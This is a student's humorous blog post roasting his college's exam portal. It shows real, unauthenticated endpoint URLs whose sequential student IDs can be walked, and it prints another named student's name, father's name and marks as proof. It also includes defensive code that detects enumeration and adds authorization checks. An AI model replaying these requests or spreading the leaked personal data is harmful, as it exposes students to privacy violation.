A hilarious deep dive into the absolute trainwreck that is my college's (SAITM) exam portal. I poked around the backend and found typos, zero security, and data leaks that’d make your jaw drop. From copy-paste captchas to exposed student info, this is a roasting session of epic proportions. Built by Sonet Microsystems, this portal is a mastercla…

Hey guys, I am Tejas Lamba of B. Tech AIML (237036). Today we got a message in our WhatsApp group that we can check our sessional marks online.

My Descent into Madness

[screenshot: the WhatsApp message]

I’m chilling when our class WhatsApp group lights up with a message saying we can check our sessional marks online. Online? In 2025? SAITM finally entering the digital age? I was hyped, like a kid unwrapping a shiny new toy.

Buckle up, because this backend, brought to you by the "geniuses" at Sonet Microsystems Pvt. Ltd., is a dumpster fire of code, security holes, and typos that’ll make you question humanity.

Yeah, them. [image]

I fired up the URL: https://erp.saitm.ac.in/InternalExam/internalExaminationMarks. The UI? Imagine a 90s Geocities page had a baby with a spreadsheet and forgot to teach it manners. Basic input fields, a captcha (lol, we’ll get to that), and a “Submit” button that screams, “I was designed in Microsoft Paint.”

[screenshot: the portal UI]

The Captcha That’s Just Vibing

I entered my details and the story starts (yes, I am blurring my birthday, I don’t want extra wishes, but thank you) [screenshot: the filled-in form] and noticed something glorious. The captcha? You can copy and paste it into the input field. Like, what’s the point, SAITM? It’s like putting a lock on a door but taping the key to the handle. Why even bother? I’m begging you, Sonet Microsystems, explain this to me like I’m five.

The Backend: A Masterclass in "It Works, Kinda"

Well, if we ignore that, let’s move forward. So we hit "Submit" and let the magic begin (after this it’s all techy stuff, so sorry for boring you guys out).

[screenshot: the LoadCheckIsValidData function]

Now y’all will be asking me, "What does this code try to do?" Let me explain in a nutshell. This function, LoadCheckIsValidData, takes a RollNO and a DatyeOFBirth (yes, that’s a typo on their end, I believe, and we’ll get to it), sends them to a server via an AJAX GET request, and checks if they’re valid. If they are, it does some bizarre captcha check and maybe triggers an OTP button click. If not, it slaps an error message on the screen. Think of it as a digital gatekeeper who’s bad at spelling and has a questionable sense of logic. I won’t bore you with the details, but here are all the funny things I found:

  • DatyeOFBirth, “Captche”, “Does not Matched”: it’s like the developer was typing with boxing gloves.
  • Synchronous AJAX freezes the browser, a cardinal sin. Use modern async patterns.
  • JSON.parse and AJAX errors are ignored, risking crashes.
  • Hardcoded everything: URLs, error messages, and magic strings are hardcoded, making maintenance a nightmare.
  • Comparing .html() to .val() for the captcha? Triggering .click()? This is duct-tape programming.
  • Vague naming: param1, param2, a, Data1, cacheInval. It’s like the developer hated clarity.
  • Debugger in prod: leaving debugger in is a rookie mistake that screams, “I didn’t test this.”
  • Errors are barely communicated, leaving users in the dark.

Anyway, some people will come at me with "Well, if it works, don’t touch it." Yeah, it does work, but how? Horribly.

Let’s move ahead on our road of misery.

The Data Leak Extravaganza: GetStudentDetailsData

I let this function run, and it calls another function named GetStudentDetailsData. Let’s dive into the mediocrity of this function.

[screenshot: the GetStudentDetailsData function]

The GetStudentDetailsData function is like a clueless librarian who hands out private student records to anyone who asks. It takes a regNo (registration number, supposedly), makes a POST request to a server, and fetches sensitive details like a student’s name, photo, date of birth, and even their dad’s name (because, sure, that’s critical).

Let’s ignore the two debugger statements and all the hardcoding and focus on something that’s GOD:

  • It fetches student details via a POST request (why POST? It’s just fetching data! It should be GET, but again, it’s her choice).

The Security Apocalypse: No Authentication

This function is a globally exposed JavaScript function, meaning anyone can open the browser console and type GetStudentDetailsData(123), GetStudentDetailsData(124), or any value to probe for student data. If the server doesn’t validate permissions either (and given this frontend’s quality, I’m not holding my breath), this is a massive data breach. You’re exposing:

  • Student names
  • Dates of birth
  • Photos
  • Father’s names
  • Departments, programs, semesters

This is PII (personally identifiable information) that could violate privacy laws like GDPR, CCPA, or FERPA. A malicious user could script a loop to try thousands of regNo values, harvesting data like a digital vacuum cleaner. It’s like leaving the school’s database on a public Google Drive with the password “password123.”
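The "script a loop over thousands of regNo values" scenario has a recognisable shape in the web server's access log: one client asking the student-record endpoints for many different identifiers, often consecutive ones, while a real student touches only their own. The added example below (my code, not the portal's) is a small detector over constructed log lines in combined-log format; the endpoint paths and parameter names are the ones quoted in this post, the IP addresses are documentation ranges, and the threshold is a hypothetical default.

```javascript
// Added example (not the portal's code): flag clients that look up many
// different student identifiers on the record endpoints named in the post.
// Log lines are constructed; IPs are documentation ranges.
const SAMPLE_LOG = [
  // One student checking their own record across several endpoints.
  '203.0.113.5 - - [23/Apr/2025:19:55:01 +0530] "POST /OnlineFeePayment/GetStudentDetailsData?AdmissionNo=237036&Schoolid=-1&optMode=GetStudentDetailsData HTTP/1.1" 200 612',
  '203.0.113.5 - - [23/Apr/2025:19:55:02 +0530] "GET /InternalExam/LoadInternalExamResultView?AdmissionNo=237036&SessionId=-1&optMode=GetMarksData HTTP/1.1" 200 388',
  '203.0.113.5 - - [23/Apr/2025:19:55:03 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3639&ConductionId=4 HTTP/1.1" 200 1420',
  // A second client walking StudentId values in sequence.
  '198.51.100.7 - - [23/Apr/2025:20:01:10 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3500&ConductionId=4 HTTP/1.1" 200 1511',
  '198.51.100.7 - - [23/Apr/2025:20:01:11 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3501&ConductionId=4 HTTP/1.1" 200 1498',
  '198.51.100.7 - - [23/Apr/2025:20:01:11 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3502&ConductionId=4 HTTP/1.1" 200 1503',
  '198.51.100.7 - - [23/Apr/2025:20:01:12 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3503&ConductionId=4 HTTP/1.1" 404 120',
  '198.51.100.7 - - [23/Apr/2025:20:01:12 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3504&ConductionId=4 HTTP/1.1" 200 1530',
  '198.51.100.7 - - [23/Apr/2025:20:01:13 +0530] "POST /InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3505&ConductionId=4 HTTP/1.1" 200 1507',
  // Noise the parser must tolerate.
  'this line is not an access log entry',
  '203.0.113.9 - - [23/Apr/2025:20:02:00 +0530] "GET /img/IT.png HTTP/1.1" 200 5120',
];

// Endpoints quoted in the post, with the query parameter that selects a student.
const WATCHED_ENDPOINTS = [
  { path: '/OnlineFeePayment/GetStudentDetailsData', idParam: 'AdmissionNo' },
  { path: '/InternalExam/LoadInternalExamResultView', idParam: 'AdmissionNo' },
  { path: '/InternalExam/GetResultViewData', idParam: 'StudentId' },
];

// Combined log format: ip ident user [time] "METHOD target PROTO" status bytes
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Returns { endpoint, id } for a request to a watched endpoint, else null.
function studentLookup(entry) {
  const url = new URL(entry.target, 'http://localhost');
  const ep = WATCHED_ENDPOINTS.find((e) => url.pathname === e.path);
  if (!ep) return null;
  const id = url.searchParams.get(ep.idParam);
  return id ? { endpoint: ep.path, id } : null;
}

// One alert per client that asked for more than maxDistinctIds identifiers.
// All statuses count: a client probing ids that do not exist is still probing.
function detectEnumeration(lines, { maxDistinctIds = 3 } = {}) {
  const perClient = new Map(); // ip -> { ids: Set, endpoints: Set }
  for (const line of lines) {
    const entry = parseLine(line);
    if (!entry) continue;
    const lookup = studentLookup(entry);
    if (!lookup) continue;
    const stats = perClient.get(entry.ip) ?? { ids: new Set(), endpoints: new Set() };
    stats.ids.add(lookup.id);
    stats.endpoints.add(lookup.endpoint);
    perClient.set(entry.ip, stats);
  }
  const alerts = [];
  for (const [ip, stats] of perClient) {
    if (stats.ids.size <= maxDistinctIds) continue;
    const nums = [...stats.ids].map(Number).sort((a, b) => a - b);
    const sequential = nums.every((n, i) => i === 0 || n === nums[i - 1] + 1);
    alerts.push({ ip, distinctIds: stats.ids.size, sequential, endpoints: [...stats.endpoints] });
  }
  return alerts;
}
```

The sequential flag is the cheap signal: a real user's identifiers never form a run like 3500, 3501, 3502. In production you would window by time (the example counts across whatever lines it is given) and key by session or account as well as IP, since students behind one campus NAT share an address.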

Now here’s where the plot thickens, or rather, completely unravels. We send a POST request (because GET is too mainstream, I guess) to

https://erp.saitm.ac.in/OnlineFeePayment/GetStudentDetailsData?AdmissionNo=237036&Schoolid=-1&optMode=GetStudentDetailsData

…and what do we get?

{
  "Table": [
    {
      "AdmissionID": 715,
      "StudentId": 3639,
      "AdmissionNo": "237036",
      "RegId": 715,
      "SchoolID": 1,
      "DepartmentID": 11,
      "ProgramID": 4,
      "BatchID": 4,
      "CurSemID": 4,
      "StudentName": "TEJAS  LAMBA",
      "FatherName": "PRAVEEN SINGH LAMBA",
      "SchoolName": "ST. ANDREWS INSTITUTE OF TECHNOLOGY & MANAGEMENT",
      "ProgramName": "BACHELOR OF TECHNOLOGY (AIML)",
      "Department": "EMERGING TECHNOLOGY",
      "BatchName": "2023-27",
      "Semester": "Semester-4",
      "FileUrl": null,
      "DateOfBirth": "22/02/2006"
    }
  ],
  "Table1": [
    {
      "TotalDues": 195625.00,
      "CreditNote": 0.00,
      "Paid": 0.00,
      "Concession": 0.00,
      "Scholorship": 0.00,
      "Balance": 195625.00
    }
  ]
}

Yes, you read that right. Not just my name and DOB, but my dad’s name, my course, semester, and the cherry on top my fee dues (yes, they really aired out my broke status too 💀).

Also, spot the typo in "Scholorship", I guess spelling wasn’t a priority while exposing my entire academic identity like it’s a Facebook birthday post.

This ain’t an API, it’s a leak disguised as a feature. Bravo, Sonet Microsystems, you’ve achieved the impossible: turning a fee portal into a public biography.

The Grand Finale: GetInternalResultData and My Sessional Marks

Now it calls another function in the same process, named GetInternalResultData.

[screenshot: the GetInternalResultData function]

What does this function do, or pretend to do? GetInternalResultData is like a shady vendor at a flea market, peddling student exam results to anyone who tosses it a regNo. It makes a GET request to a server, grabs a pile of exam data, and tries to build a table in the DOM to display it. If it works, you get a table with semesters, evaluation parameters, and buttons to view results. If it fails, it slaps a vague error message on the screen. But here’s the kicker: it’s wide open.

We have our friend debugger; again, in production code, lmao. It’s a sign of sloppy development and zero cleanup. But we have progress, guys, dw: it’s a GET request (yay, finally not freezing the browser, with async: true!).

The main part y’all were waiting for:

The Security Catastrophe: No Authentication, Now with GET!

Like its predecessors, GetInternalResultData is a global function with no authentication. You can open the console and type GetInternalResultData(123) to fetch exam results for any student, exposing:

  • Semesters
  • Evaluation parameters
  • Student IDs (in button IDs/values)
  • Exam types

Since it’s a GET request, it’s even easier to exploit. Just craft a URL like:

https://erp.saitm.ac.in/InternalExam/LoadInternalExamResultView?AdmissionNo=123&SessionId=-1&SchoolId=-1&DepartmentId=-1&ProgramId=-1&SemesterID=-1&ExamType=-1&ExamName=-1&optMode=GetMarksData

and you can hit the endpoint directly. This is a data breach on steroids, violating privacy laws (GDPR, FERPA, CCPA) and exposing sensitive academic data to anyone with a browser. It’s like posting exam scores on a public billboard with students’ IDs attached.
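Every endpoint above fails in the same place: the server trusts whatever AdmissionNo or StudentId the client sends and never asks who is sending it. The roll-number plus date-of-birth gate on the first page is not authentication either, because the fee endpoint hands DateOfBirth back to anyone who asks. The added example below (my code, not the portal's or Sonet Microsystems') shows the missing server-side check for the GetStudentDetailsData and GetInternalResultData cases: a session from a real login, an authorization rule tying the requested record to that session, and a "my marks" route that does not accept a student id from the client at all. The records, session store, roles and ids are all constructed for the example.

```javascript
// Added example (not the portal's code): the authorization check missing from
// the student-record endpoints described in the post. All data is constructed.
const STUDENTS = new Map([
  [1001, { enrollmentNo: '230001', departmentId: 11,
           marks: [{ subject: 'Computer Networks', max: 30, obtained: 7 }] }],
  [1002, { enrollmentNo: '230002', departmentId: 10,
           marks: [{ subject: 'Discrete Mathematics', max: 30, obtained: 15 }] }],
]);

// A session must come from a real login with a secret only the student holds.
// Roll number + DOB does not qualify here: the fee endpoint returns the DOB.
// Opaque cookie value -> principal (constructed; a real store would be server-side state).
const SESSIONS = new Map([
  ['s-alice', { role: 'student', studentId: 1001 }],
  ['s-prof',  { role: 'faculty', departmentIds: [10] }],
]);

function authenticate(req) {
  return SESSIONS.get(req.cookies?.sid) ?? null;
}

// The rule the portal never applies: is this principal allowed to see this record?
function mayReadRecord(principal, studentId, record) {
  switch (principal.role) {
    case 'student': return principal.studentId === studentId;
    case 'faculty': return principal.departmentIds.includes(record.departmentId);
    default:        return false;
  }
}

// Handler shape for GetResultViewData-style lookups: { status, body }.
function getStudentMarks(req) {
  const principal = authenticate(req);
  if (!principal) return { status: 401, body: { error: 'login required' } };

  const studentId = Number(req.query?.StudentId);
  if (!Number.isInteger(studentId) || studentId <= 0) {
    return { status: 400, body: { error: 'bad StudentId' } };
  }

  const record = STUDENTS.get(studentId);
  // Same answer for "no such record" and "not yours": a client walking ids
  // learns neither which ids exist nor which ones belong to someone else.
  if (!record || !mayReadRecord(principal, studentId, record)) {
    return { status: 404, body: { error: 'not found' } };
  }
  return {
    status: 200,
    body: { StudentId: studentId, EnrollmentNo: record.enrollmentNo, Marks: record.marks },
  };
}

// For the student's own results page, take the id from the session, never the request.
function getMyMarks(req) {
  const principal = authenticate(req);
  if (!principal || principal.role !== 'student') {
    return { status: 401, body: { error: 'student login required' } };
  }
  return getStudentMarks({ ...req, query: { StudentId: String(principal.studentId) } });
}
```

With this in place the console trick from the post (GetInternalResultData(123), then 124, and so on) still runs in the browser, but each call comes back 401 without a session and 404 for every record the session does not own; the logs then show the probing instead of the data leaving.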

Now for the part I was hyped about: hitting that sketchy GET endpoint directly:

https://erp.saitm.ac.in/InternalExam/LoadInternalExamResultView?AdmissionNo=237036&SessionId=-1&SchoolId=-1&DepartmentId=-1&ProgramId=-1&SemesterID=-1&ExamType=-1&ExamName=-1&optMode=GetMarksData

I opened that in the browser, and guess what I got?

{
  "Table": [
    {
      "StudentID": 3639,
      "Semester": "Semester-4",
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4
    },
    {
      "StudentID": 3639,
      "Semester": "Semester-4",
      "EvaluationParameter": "ASSIGNMENT",
      "ExamType": 5
    },
    {
      "StudentID": 3639,
      "Semester": "Semester-4",
      "EvaluationParameter": "QUIZ/ CLASS TEST",
      "ExamType": 6
    },
    {
      "StudentID": 3639,
      "Semester": "Semester-4",
      "EvaluationParameter": "ATTENDANCE",
      "ExamType": 7
    }
  ]
}

Now guys, I know what you’re thinking: "Tejas, isn’t there something interesting here?" Well well well, progress is progress.

Now, I won’t show you guys how I got this, but you’re free to find it on your own. When we go to the URL

https://erp.saitm.ac.in/InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3639&ConductionId=4

(make a POST request please, because again these guys are idiots and they don’t understand why we use POST and GET), we get my full-fledged sessional marks:

{
  "Table": [
    {
      "imgUrl": "\\img\\IT.png",
      "StudentId": 3639,
      "EnrollmentNo": "237036",
      "StudentName": "TEJAS LAMBA",
      "SchoolName": "ST. ANDREWS INSTITUTE OF TECHNOLOGY & MANAGEMENT",
      "fatherName": "PRAVEEN SINGH LAMBA",
      "Department": "EMERGING TECHNOLOGY",
      "Program": "BACHELOR OF TECHNOLOGY (AIML)",
      "Semester": "Semester-4",
      "FileUrl": "",
      "BatchID": 4,
      "SchoolID": 1,
      "DepartmentID": 11,
      "ProgramID": 4
    }
  ],
  "Table1": [
    {
      "StudentID": 3639,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "Computer Networks",
      "SubjectCode": "PCC-CSE-303G",
      "ExamDate": "19 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 7.00
    },
    {
      "StudentID": 3639,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "Design & Analysis of Algorithms",
      "SubjectCode": "PCC-CSE-307G",
      "ExamDate": "20 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 12.00
    },
    {
      "StudentID": 3639,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "DISCRETE MATHEMATICS",
      "SubjectCode": "PCC-CSE-202G",
      "ExamDate": "18 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 2.00
    },
    {
      "StudentID": 3639,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "Introduction to Machine Learning",
      "SubjectCode": "PCC-AIML-241G",
      "ExamDate": "18 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 10.00
    },
    {
      "StudentID": 3639,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "OPERATING SYSTEM",
      "SubjectCode": "PCC-CSE-206G",
      "ExamDate": "20 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 9.00
    },
    {
      "StudentID": 3639,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "UNIVERSAL HUMAN VALUE ETHICS",
      "SubjectCode": "MC-UHV-II",
      "ExamDate": "21 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 10.00
    }
  ]
}

(Yes you can laugh at my marks while I laugh at your career coz this college can't get you placed)

Now, just to verify that this works for anyone, we take a random 4-digit number, let’s say 3500, put it in as the StudentId, and see what we get:

{
  "Table": [
    {
      "imgUrl": "\\img\\IT.png",
      "StudentId": 3500,
      "EnrollmentNo": "233189",
      "StudentName": "HARSHIT SINGH RAUTELA",
      "SchoolName": "ST. ANDREWS INSTITUTE OF TECHNOLOGY & MANAGEMENT",
      "fatherName": "MAHENDRA SINGH RAUTELA",
      "Department": "COMPUTER SCIENCE & ENGINEERING",
      "Program": "BACHELOR OF TECHNOLOGY (CSE)",
      "Semester": "Semester-4",
      "FileUrl": "",
      "BatchID": 4,
      "SchoolID": 1,
      "DepartmentID": 10,
      "ProgramID": 15
    }
  ],
  "Table1": [
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "DISCRETE MATHEMATICS",
      "SubjectCode": "PCC-CSE-202G",
      "ExamDate": "18 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 15.00
    },
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "ENVIRONMENTAL SCIENCES",
      "SubjectCode": "MC-106G",
      "ExamDate": "21 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 0.00
    },
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "OBJECT ORIENTED PROGRAMMING",
      "SubjectCode": "PCC-CSE-208G",
      "ExamDate": "19 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 25.00
    },
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "OPERATING SYSTEM",
      "SubjectCode": "PCC-CSE-206G",
      "ExamDate": "20 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 13.00
    },
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "UNIVERSAL HUMAN VALUE ETHICS",
      "SubjectCode": "MC-UHV-II",
      "ExamDate": "21 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 22.00
    },
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "WEB TECHNOLOGIES",
      "SubjectCode": "PCC-CSE-210G",
      "ExamDate": "18 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 20.00
    },
    {
      "StudentID": 3500,
      "EvaluationParameter": "SESSIONAL 1",
      "ExamType": 4,
      "SubjectName": "ORGANIZATIONAL BEHAVIOUR",
      "SubjectCode": "HSMC-02G",
      "ExamDate": "20 Mar 2025",
      "MaxMarks": 30.00,
      "MarksObtained": 24.00
    }
  ]
}

I got another student’s full details and marks. Name, father’s name, grades, everything. It’s like SAITM built a public database and called it a portal.

The Verdict: A Security Nightmare

This portal is a masterclass in how not to build a web app. No authentication, hardcoded URLs, typos that hurt my soul, and enough PII leaks to make a lawyer’s head spin. Sonet Microsystems, take a bow: you’ve turned a simple exam portal into a privacy apocalypse. SAITM, maybe next time hire developers who know what “security” means.

To my fellow students: check your marks, but maybe don’t trust this portal with your data. To the admins: fix this before someone turns your database into a Reddit thread. And to Sonet Microsystems: I’d say “do better,” but at this point, just… do something.

Peace out, Tejas Lamba, AIML 4th Semester


Update: I tried contacting Sonet Microsystems on their email and here is what I get:
https://sonetmicrosystems.com/support/

[screenshots: the support page]
